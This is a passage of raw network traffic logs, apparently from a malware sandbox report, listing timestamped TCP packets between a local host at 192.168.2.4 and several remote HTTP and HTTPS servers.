Jan 14, 2022 00:15:51.735091925 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.735105038 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.735162973 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.735198021 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.735213995 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.735249043 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.735367060 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.788904905 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:55.315440893 CET	49874	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:55.366992950 CET	80	49874	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:55.367105961 CET	49874	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:55.367337942 CET	49874	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:55.367362976 CET	49874	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:55.418951035 CET	80	49874	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:55.445257902 CET	80	49874	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:55.445324898 CET	80	49874	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:55.445400953 CET	49874	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:55.445697069 CET	49874	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:55.473536968 CET	49875	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:55.497381926 CET	80	49874	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:55.526323080 CET	80	49875	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:55.526417971 CET	49875	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:55.526515961 CET	49875	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:55.526534081 CET	49875	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:55.577843904 CET	80	49875	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:55.577913046 CET	80	49875	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:55.606107950 CET	80	49875	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:55.606215954 CET	49875	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:55.606425047 CET	49875	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:55.636472940 CET	49876	443	192.168.2.4	104.21.38.221
Jan 14, 2022 00:15:55.636524916 CET	443	49876	104.21.38.221	192.168.2.4
Jan 14, 2022 00:15:55.636609077 CET	49876	443	192.168.2.4	104.21.38.221
Jan 14, 2022 00:15:55.636933088 CET	49876	443	192.168.2.4	104.21.38.221
Jan 14, 2022 00:15:55.636957884 CET	443	49876	104.21.38.221	192.168.2.4
Jan 14, 2022 00:15:55.657749891 CET	80	49875	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:55.722986937 CET	443	49876	104.21.38.221	192.168.2.4
Jan 14, 2022 00:15:55.723107100 CET	49876	443	192.168.2.4	104.21.38.221
Jan 14, 2022 00:15:55.725145102 CET	49876	443	192.168.2.4	104.21.38.221
Jan 14, 2022 00:15:55.725177050 CET	443	49876	104.21.38.221	192.168.2.4
Jan 14, 2022 00:15:55.725415945 CET	443	49876	104.21.38.221	192.168.2.4
Jan 14, 2022 00:15:55.726428986 CET	49876	443	192.168.2.4	104.21.38.221
Jan 14, 2022 00:15:55.769869089 CET	443	49876	104.21.38.221	192.168.2.4
Jan 14, 2022 00:15:56.013241053 CET	443	49876	104.21.38.221	192.168.2.4
Jan 14, 2022 00:15:56.013422012 CET	443	49876	104.21.38.221	192.168.2.4
Jan 14, 2022 00:15:56.013505936 CET	443	49876	104.21.38.221	192.168.2.4
Jan 14, 2022 00:15:56.013534069 CET	49876	443	192.168.2.4	104.21.38.221
Jan 14, 2022 00:15:56.013578892 CET	443	49876	104.21.38.221	192.168.2.4
Jan 14, 2022 00:15:56.013645887 CET	49876	443	192.168.2.4	104.21.38.221
Jan 14, 2022 00:15:56.013663054 CET	443	49876	104.21.38.221	192.168.2.4
Jan 14, 2022 00:15:56.013731003 CET	443	49876	104.21.38.221	192.168.2.4
Jan 14, 2022 00:15:56.013811111 CET	49876	443	192.168.2.4	104.21.38.221
Jan 14, 2022 00:15:56.013813972 CET	443	49876	104.21.38.221	192.168.2.4
Jan 14, 2022 00:15:56.013835907 CET	443	49876	104.21.38.221	192.168.2.4
Jan 14, 2022 00:15:56.013921976 CET	49876	443	192.168.2.4	104.21.38.221
Jan 14, 2022 00:15:56.013943911 CET	443	49876	104.21.38.221	192.168.2.4
Jan 14, 2022 00:15:56.014098883 CET	443	49876	104.21.38.221	192.168.2.4
Jan 14, 2022 00:15:56.014193058 CET	49876	443	192.168.2.4	104.21.38.221
Jan 14, 2022 00:15:56.016448975 CET	49876	443	192.168.2.4	104.21.38.221
Jan 14, 2022 00:15:56.016475916 CET	443	49876	104.21.38.221	192.168.2.4
Jan 14, 2022 00:15:56.016503096 CET	49876	443	192.168.2.4	104.21.38.221
Jan 14, 2022 00:15:56.016515970 CET	443	49876	104.21.38.221	192.168.2.4
Jan 14, 2022 00:15:56.045802116 CET	49877	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:56.097464085 CET	80	49877	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:56.097570896 CET	49877	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:56.097671032 CET	49877	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:56.098961115 CET	49877	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:56.149494886 CET	80	49877	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:56.150845051 CET	80	49877	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:56.186436892 CET	80	49877	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:56.187028885 CET	49877	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:56.187190056 CET	49877	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:56.226176977 CET	49878	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:15:56.226231098 CET	443	49878	144.76.136.153	192.168.2.4
Jan 14, 2022 00:15:56.226330996 CET	49878	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:15:56.226682901 CET	49878	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:15:56.226701021 CET	443	49878	144.76.136.153	192.168.2.4
Jan 14, 2022 00:15:56.238588095 CET	80	49877	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:56.315939903 CET	443	49878	144.76.136.153	192.168.2.4
Jan 14, 2022 00:15:56.316117048 CET	49878	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:15:56.318691969 CET	49878	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:15:56.318722010 CET	443	49878	144.76.136.153	192.168.2.4
Jan 14, 2022 00:15:56.318967104 CET	443	49878	144.76.136.153	192.168.2.4
Jan 14, 2022 00:15:56.320034981 CET	49878	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:15:56.361871958 CET	443	49878	144.76.136.153	192.168.2.4
Jan 14, 2022 00:15:56.378099918 CET	443	49878	144.76.136.153	192.168.2.4
Jan 14, 2022 00:15:56.378200054 CET	443	49878	144.76.136.153	192.168.2.4
Jan 14, 2022 00:15:56.378355026 CET	49878	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:15:56.399833918 CET	49878	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:15:56.399872065 CET	443	49878	144.76.136.153	192.168.2.4
Jan 14, 2022 00:15:56.442841053 CET	49879	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:56.493436098 CET	80	49879	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:56.493742943 CET	49879	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:56.493940115 CET	49879	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:56.493959904 CET	49879	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:56.544338942 CET	80	49879	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:56.571701050 CET	80	49879	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:56.571737051 CET	80	49879	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:56.571898937 CET	49879	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:56.571947098 CET	49879	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:56.600986004 CET	49880	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:56.622549057 CET	80	49879	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:56.652473927 CET	80	49880	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:56.652658939 CET	49880	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:56.652734995 CET	49880	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:56.652777910 CET	49880	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:56.704591036 CET	80	49880	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:56.735932112 CET	80	49880	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:56.739067078 CET	49880	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:56.739105940 CET	49880	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:56.767690897 CET	49881	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:56.790654898 CET	80	49880	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:56.818552017 CET	80	49881	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:56.818660021 CET	49881	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:56.818768978 CET	49881	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:56.818783045 CET	49881	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:56.869460106 CET	80	49881	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:56.895817041 CET	80	49881	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:56.896068096 CET	49881	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:56.896401882 CET	49881	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:56.934901953 CET	49882	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:56.947068930 CET	80	49881	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:56.986975908 CET	80	49882	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:56.987148046 CET	49882	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:56.987200022 CET	49882	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:56.987210035 CET	49882	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.039372921 CET	80	49882	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.063930035 CET	80	49882	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.064091921 CET	49882	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.064202070 CET	49882	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.117358923 CET	80	49882	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.126933098 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.177629948 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.177748919 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.177855015 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.237055063 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.237090111 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.237119913 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.237150908 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.237154007 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.237179995 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.237210989 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.237238884 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.237266064 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.238194942 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.238214016 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.238239050 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.238274097 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.238282919 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.238339901 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.287647009 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.287702084 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.287744045 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.287781954 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.287821054 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.287861109 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.287864923 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.287894964 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.287899017 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.287938118 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.287969112 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.287977934 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.287982941 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.288017035 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.288059950 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.288098097 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.288117886 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.288156986 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.288747072 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.288785934 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.288825989 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.288882017 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.288892031 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.288929939 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.288970947 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.288988113 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.289011002 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.289026022 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.289051056 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.291131973 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.338435888 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.338489056 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.338530064 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.338570118 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.338607073 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.338644981 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.338646889 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.338675976 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.338687897 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.338700056 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.338726997 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.338764906 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.338804007 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.338828087 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.338840961 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.338860035 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.338880062 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.338918924 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.338958025 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.338972092 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.338998079 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.339015007 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.339036942 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.339080095 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.339119911 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.339123011 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.339157104 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.339173079 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.339196920 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.339236975 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.339276075 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.339293003 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.339315891 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.339334965 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.339353085 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.339391947 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.339432001 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.339445114 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.339468002 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.339481115 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.339507103 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.339546919 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.339586973 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.339600086 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.339627028 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.339642048 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.339664936 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.339704037 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.339742899 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.339756012 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.339780092 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.339797020 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.340312004 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.342031002 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.343480110 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.343502998 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.343548059 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.343558073 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.343579054 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.343648911 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.390275002 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.390328884 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.390369892 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.390408039 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.390446901 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.390475988 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.390486956 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.390526056 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.390536070 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.390556097 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.390567064 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.390605927 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.390623093 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.390644073 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.390683889 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.390722036 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.390738010 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.390805006 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.390814066 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.390846014 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.390883923 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.390923977 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.390944958 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.390965939 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.390985012 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.391004086 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.391043901 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.391089916 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.391103029 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.391128063 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.391168118 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.391181946 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.391207933 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.391239882 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.391247988 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.391288996 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.391302109 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.391325951 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.391365051 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.391403913 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.391422033 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.391442060 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.391454935 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.391480923 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.391520023 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.391560078 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.391576052 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.391601086 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.391613960 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.391639948 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.391679049 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.391699076 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.391719103 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.391757011 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.391794920 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.391817093 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.391846895 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.391868114 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.391886950 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.391931057 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.391968012 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.391983986 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.392019987 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.392086029 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.392126083 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.392188072 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.394774914 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.394828081 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.394866943 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.394907951 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.394937992 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.394948006 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.394982100 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.442233086 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.442289114 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.442327023 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.442365885 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.442404985 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.442441940 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.442441940 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.442471981 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.442476988 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.442481995 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.442523956 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.442539930 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.442563057 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.442603111 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.442640066 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.442656994 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.442679882 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.442694902 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.442718983 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.442755938 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.442795038 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.442807913 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.442835093 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.442847967 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.442874908 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.442915916 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.442954063 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.442970037 CET	49884	80	192.168.2.4	93.189.42.167
